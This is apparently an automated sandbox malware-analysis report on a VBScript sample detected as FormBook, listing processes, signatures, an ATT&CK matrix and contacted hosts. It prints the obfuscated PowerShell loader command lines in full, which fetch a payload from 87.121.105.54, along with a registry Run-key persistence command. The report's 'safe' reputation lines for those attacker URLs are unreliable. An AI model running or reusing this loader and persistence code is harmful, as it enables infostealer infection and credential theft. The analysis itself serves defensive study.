punki st rg,ross=sk.iv$handgdalhusigaulle diaznfradr. oversstephp sheblservaigymnatamtsv(ouvri$alpevlhospiod apen idocgse.ulrsustiu griln spar)ele h ');$dien=$faerdig[0];biblioteksfilerne (tyknende ' girl$ un ega droldredgomortabover,a b.ba
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "startup key" /t reg_expand_sz /d "%tidsperioderne189% -w 1 $yodellers23=(get-itemproperty -path 'hkcu:\lrlingekontrakten\').propertyless;%tidsperioderne189% ($yodellers23)"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$reglorified = 1;$toupe='s';$toupe+='ubstrin';$toupe+='g';function tyknende($frontotemporal){$kommandodeles=$frontotemporal.length-$reglorified;for($nummerordens=5;$nummerordens -lt $kommandodeles;$nummerordens+=6){$crpe+=$frontotemporal.$toupe.invoke( $nummerordens, $reglorified);}$crpe;}function biblioteksfilerne($kedelcentralen){& ($dataanlgs) ($kedelcentralen);}$udskilles=tyknende 'snuggmfo.oro loo zka.anistoo,lflan lsmaaga len,/ u fi5h.gge.mawse0 xant lint(reae wpaikiitorden stnidsk ftom.gtswgrasssgivin hovs.nas.ertoutbr kvot,1goupi0poess. ook0recr,;tilkn b.arwunderitorrinkalku6rekor4vandm; oldt godkexslamb6anvis4overw;rente taalrrrgssvsvige:ae,li1synan2 rupi1 ukat.,onra0lo.ds)apoth louirgtempee overcgenfokiso.co syst/menis2ioevr0stan.1varsl0 sses0subst1 coex0un af1raias ildnefdo,ediovnhur,etere luk,fareahonobblx ara/ ekvi1kha.e2folk,1b.lls. besk0forme ';$primevally=tyknende '.rsteuhy,osssquibe,parerrewar-tenanafictigaffaee parn jerrt myrt ';$dien=tyknende 'synsmhmilittvajedtdarenps.eep:dob,o/perpl/erase8siren7nonwe. jack1 ,ive2 over1 ar,g.beret1retst0maler5reded..ippe5spare4count/sculpochapoxmec da d,pllbl eduslippr imuli cplma indi2ret t0libet9thick.no,enspostnmjo,dbi.onsu ';$longrun=tyknende 'folke>patte ';$dataanlgs=tyknende ' verdi unree nonvxtppe ';$traditions='nashira';biblioteksfilerne (tyknende 'gregssunassegrmmetpersi-hvalfcpieb.o inv n cinntherdseprve nindtetbrede argum-refitppla tambelptafgrfhklar knivbtc,rva:morte\konomgslutkrs.igey s,agnblahltpne,me stern silkdtalene fejnsmes n.fritit submxbismutcosmo under-rhyptv ext.a ,atol f,inupubliekolla nook $skrivtrubler.orynachancdzonalige.trtc.nidi noncokitnin uds,sorig ;recep ');biblioteksfilerne (tyknende ' repai edelfbasqu diff(hoppetstucce sce,s ivsvtepe.i-.odstpbarriatyroltsysgth ang calcatpatro:rigad\isoclgunordr aggryamputn,hrootbordhe agttn myecdgui ee revesflere.ps,udtplastxpantet prun) snot{d sene vindxleafsikultutsonor} sies;limen ');$kursusoversigten = tyknende 'servoe ontcn gashbi.loounchi preco%vagnuakodiappseu,pse,igdalt.baperu.tinteraspa.l%stuve\dismevcirc.akerattfarvee sprarsleysps.angasha rsgutsesunmeweylvahnsundheafspnsksehu2wiens4 para.besteapatruc .llecmyone resou&parad&t.lip discuedurescbogtihlgel,okilot re.ia$b sni ';biblioteksfilerne (tyknende 'blidh$kitnigtoxollstrbsogeckobs,ffeaaristltrans:tun,ntmephii.ammetde uta.apitrsto.m= i.er(modtac presmindevdafhng henst/tenebcopt.i im,r$hord,k trykufje nr skgls beliusukkesnyoprokomm,vtelesepharmr aritsl mpnianligg rimot tweeeempirndi.yo)majus ');biblioteksfilerne (tyknende 'citat$comp.gend,sl trygoajlefbweddea br,dl haa.:hold fslidsarefusel.ngtraarvad punki st rg,ross=sk.iv$handgdalhusigaulle diaznfradr. oversstephp sheblservaigymnatamtsv(ouvri$alpevlhospiod apen idocgse.ulrsustiu griln spar)ele h ');$dien=$faerdig[0];biblioteksfilerne (tyknende ' girl$ un ega droldredgomortabover,a b.baJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$reglorified = 1;$toupe='s';$toupe+='ubstrin';$toupe+='g';function tyknende($frontotemporal){$kommandodeles=$frontotemporal.length-$reglorified;for($nummerordens=5;$nummerordens -lt $kommandodeles;$nummerordens+=6){$crpe+=$frontotemporal.$toupe.invoke( $nummerordens, $reglorified);}$crpe;}function biblioteksfilerne($kedelcentralen){& ($dataanlgs) ($kedelcentralen);}$udskilles=tyknende 'snuggmfo.oro loo zka.anistoo,lflan lsmaaga len,/ u fi5h.gge.mawse0 xant lint(reae wpaikiitorden stnidsk ftom.gtswgrasssgivin hovs.nas.ertoutbr kvot,1goupi0poess. ook0recr,;tilkn b.arwunderitorrinkalku6rekor4vandm; oldt godkexslamb6anvis4overw;rente taalrrrgssvsvige:ae,li1synan2 rupi1 ukat.,onra0lo.ds)apoth louirgtempee overcgenfokiso.co syst/menis2ioevr0stan.1varsl0 sses0subst1 coex0un af1raias ildnefdo,ediovnhur,etere luk,fareahonobblx ara/ ekvi1kha.e2folk,1b.lls. besk0forme ';$primevally=tyknende '.rsteuhy,osssquibe,parerrewar-tenanafictigaffaee parn jerrt myrt ';$dien=tyknende 'synsmhmilittvajedtdarenps.eep:dob,o/perpl/erase8siren7nonwe. jack1 ,ive2 over1 ar,g.beret1retst0maler5reded..ippe5spare4count/sculpochapoxmec da d,pllbl eduslippr imuli cplma indi2ret t0libet9thick.no,enspostnmjo,dbi.onsu ';$longrun=tyknende 'folke>patte ';$dataanlgs=tyknende ' verdi unree nonvxtppe ';$traditions='nashira';biblioteksfilerne (tyknende 'gregssunassegrmmetpersi-hvalfcpieb.o inv n cinntherdseprve nindtetbrede argum-refitppla tambelptafgrfhklar knivbtc,rva:morte\konomgslutkrs.igey s,agnblahltpne,me stern silkdtalene fejnsmes n.fritit submxbismutcosmo under-rhyptv ext.a ,atol f,inupubliekolla nook $skrivtrubler.orynachancdzonalige.trtc.nidi noncokitnin uds,sorig ;recep ');biblioteksfilerne (tyknende ' repai edelfbasqu diff(hoppetstucce sce,s ivsvtepe.i-.odstpbarriatyroltsysgth ang calcatpatro:rigad\isoclgunordr aggryamputn,hrootbordhe agttn myecdgui ee revesflere.ps,udtplastxpantet prun) snot{d sene vindxleafsikultutsonor} sies;limen ');$kursusoversigten = tyknende 'servoe ontcn gashbi.loounchi preco%vagnuakodiappseu,pse,igdalt.baperu.tinteraspa.l%stuve\dismevcirc.akerattfarvee sprarsleysps.angasha rsgutsesunmeweylvahnsundheafspnsksehu2wiens4 para.besteapatruc .llecmyone resou&parad&t.lip discuedurescbogtihlgel,okilot re.ia$b sni ';biblioteksfilerne (tyknende 'blidh$kitnigtoxollstrbsogeckobs,ffeaaristltrans:tun,ntmephii.ammetde uta.apitrsto.m= i.er(modtac presmindevdafhng henst/tenebcopt.i im,r$hord,k trykufje nr skgls beliusukkesnyoprokomm,vtelesepharmr aritsl mpnianligg rimot tweeeempirndi.yo)majus ');biblioteksfilerne (tyknende 'citat$comp.gend,sl trygoajlefbweddea br,dl haa.:hold fslidsarefusel.ngtraarvad punki st rg,ross=sk.iv$handgdalhusigaulle diaznfradr. oversstephp sheblservaigymnatamtsv(ouvri$alpevlhospiod apen idocgse.ulrsustiu griln spar)ele h ');$dien=$faerdig[0];biblioteksfilerne (tyknende ' girl$ un ega droldredgomortabover,a b.baJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "startup key" /t reg_expand_sz /d "%tidsperioderne189% -w 1 $yodellers23=(get-itemproperty -path 'hkcu:\lrlingekontrakten\').propertyless;%tidsperioderne189% ($yodellers23)"Jump to behavior
          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 00000014.00000002.2971248438.0000000000EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2454959206.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.2971966360.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.2697965276.00000000010E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2503696155.0000000025250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.2971188176.0000000000E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 00000014.00000002.2971248438.0000000000EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2454959206.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.2971966360.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.2697965276.00000000010E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2503696155.0000000025250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.2971188176.0000000000E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information221
          Scripting          		Valid Accounts1
          Windows Management Instrumentation          		221
          Scripting          		1
          Abuse Elevation Control Mechanism          		1
          Deobfuscate/Decode Files or Information          		OS Credential Dumping1
          File and Directory Discovery          		Remote Services1
          Archive Collected Data          		1
          Ingress Tool Transfer          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Exploitation for Client Execution          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Abuse Elevation Control Mechanism          		LSASS Memory14
          System Information Discovery          		Remote Desktop ProtocolData from Removable Media1
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts11
          Command and Scripting Interpreter          		1
          Registry Run Keys / Startup Folder          		311
          Process Injection          		4
          Obfuscated Files or Information          		Security Account Manager21
          Security Software Discovery          		SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts2
          PowerShell          		Login Hook1
          Registry Run Keys / Startup Folder          		1
          Software Packing          		NTDS1
          Process Discovery          		Distributed Component Object ModelInput Capture12
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading          		LSA Secrets31
          Virtualization/Sandbox Evasion          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Masquerading          		Cached Domain Credentials1
          Application Window Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Modify Registry          		DCSync1
          Remote System Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
          Virtualization/Sandbox Evasion          		Proc Filesystem1
          System Network Configuration Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt311
          Process Injection          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1436288 Sample: Zahlungsbeleg 202405029058.vbs Startdate: 04/05/2024 Architecture: WINDOWS Score: 100 65 google.com 2->65 77 Malicious sample detected (through community Yara rule) 2->77 79 Antivirus detection for URL or domain 2->79 81 Yara detected FormBook 2->81 83 3 other signatures 2->83 13 wscript.exe 1 2->13         started        signatures3 process4 signatures5 97 VBScript performs obfuscated calls to suspicious functions 13->97 99 Suspicious powershell command line found 13->99 101 Wscript starts Powershell (via cmd or directly) 13->101 103 4 other signatures 13->103 16 powershell.exe 14 19 13->16         started        20 PING.EXE 1 13->20         started        22 cmd.exe 1 13->22         started        24 PING.EXE 1 13->24         started        process6 dnsIp7 61 87.121.105.54, 49731, 49737, 80 NET1-ASBG Bulgaria 16->61 67 Suspicious powershell command line found 16->67 69 Very long command line found 16->69 71 Found suspicious powershell code related to unpacking or dynamic code loading 16->71 26 powershell.exe 17 16->26         started        29 conhost.exe 16->29         started        31 cmd.exe 1 16->31         started        63 google.com 142.250.72.174 GOOGLEUS United States 20->63 33 conhost.exe 20->33         started        35 conhost.exe 22->35         started        37 conhost.exe 24->37         started        signatures8 process9 signatures10 89 Writes to foreign memory regions 26->89 91 Found suspicious powershell code related to unpacking or dynamic code loading 26->91 39 wab.exe 2 7 26->39         started        42 cmd.exe 1 26->42         started        process11 signatures12 85 Maps a DLL or memory area into another process 39->85 44 kOAlByYcnQDKnTplLRjSHzGyPq.exe 39->44 injected 47 cmd.exe 1 39->47         started        process13 signatures14 93 Maps a DLL or memory area into another process 44->93 95 Found direct / indirect Syscall (likely to bypass EDR) 44->95 49 clip.exe 44->49         started        52 conhost.exe 47->52         started        54 reg.exe 1 1 47->54         started        process15 signatures16 73 Maps a DLL or memory area into another process 49->73 75 Queues an APC in another process (thread injection) 49->75 56 kOAlByYcnQDKnTplLRjSHzGyPq.exe 49->56 injected process17 signatures18 87 Found direct / indirect Syscall (likely to bypass EDR) 56->87 59 WerFault.exe 21 56->59         started        process19

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Zahlungsbeleg 202405029058.vbs0%ReversingLabs

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          bg.microsoft.map.fastly.net0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
          http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
          https://go.micro0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          http://87.121.105.54/Oxaluria209.smiP0%Avira URL Cloudsafe
          http://87.121.105.540%Avira URL Cloudsafe
          http://87.121.105.54/Oxaluria209.smi0%Avira URL Cloudsafe
          http://87.121.H0%Avira URL Cloudsafe
          http://87.121.105.54/vKdsOriqv105.bin0%Avira URL Cloudsafe
          http://87.121.105.54/Oxaluria209.smi0%VirustotalBrowse

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          bg.microsoft.map.fastly.net
          		199.232.214.172
          		truefalseunknown
          google.com
          		142.250.72.174
          		truefalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://87.121.105.54/Oxaluria209.smifalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://87.121.105.54/vKdsOriqv105.binfalse
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://87.121.105.54/Oxaluria209.smiPpowershell.exe, 00000007.00000002.2596105612.000001A98C3A7000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.2815067045.000001A99C1F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2197404574.000000000580B000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://87.121.105.54powershell.exe, 00000007.00000002.2596105612.000001A98C3A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2596105612.000001A98E1B0000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000A.00000002.2141351591.00000000048F8000.00000004.00000800.00020000.00000000.sdmptrue
              • URL Reputation: malware
              • URL Reputation: malware
              		unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000A.00000002.2141351591.00000000048F8000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://go.micropowershell.exe, 00000007.00000002.2596105612.000001A98D62D000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/powershell.exe, 0000000A.00000002.2197404574.000000000580B000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.2815067045.000001A99C1F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2197404574.000000000580B000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://contoso.com/Licensepowershell.exe, 0000000A.00000002.2197404574.000000000580B000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 0000000A.00000002.2197404574.000000000580B000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  https://aka.ms/pscore68powershell.exe, 00000007.00000002.2596105612.000001A98C181000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.2596105612.000001A98C181000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://87.121.Hpowershell.exe, 00000007.00000002.2596105612.000001A98E1B0000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.com/Pester/Pesterpowershell.exe, 0000000A.00000002.2141351591.00000000048F8000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        142.250.72.174
                        		google.comUnited States
                        		15169GOOGLEUSfalse
                        87.121.105.54
                        		unknownBulgaria
                        		43561NET1-ASBGfalse

                        General Information

                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1436288
                        Start date and time:2024-05-04 09:50:36 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 9m 53s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:24
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:2
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:Zahlungsbeleg 202405029058.vbs
                        Detection:MAL
                        Classification:mal100.troj.expl.evad.winVBS@29/13@1/2
                        EGA Information:
                        • Successful, ratio: 40%
                        HCA Information:
                        • Successful, ratio: 77%
                        • Number of executed functions: 89
                        • Number of non-executed functions: 263
                        Cookbook Comments:
                        • Found application associated with file extension: .vbs

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 199.232.214.172, 52.168.117.173
                        • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, ctldl.windowsupdate.com.delivery.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target powershell.exe, PID 7316 because it is empty
                        • Execution Graph export aborted for target powershell.exe, PID 7560 because it is empty
                        • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • Not all processes where analyzed, report is missing behavior information
                        • Report creation exceeded maximum time and may have missing disassembly code information.
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtCreateKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        08:52:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Startup key %Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)
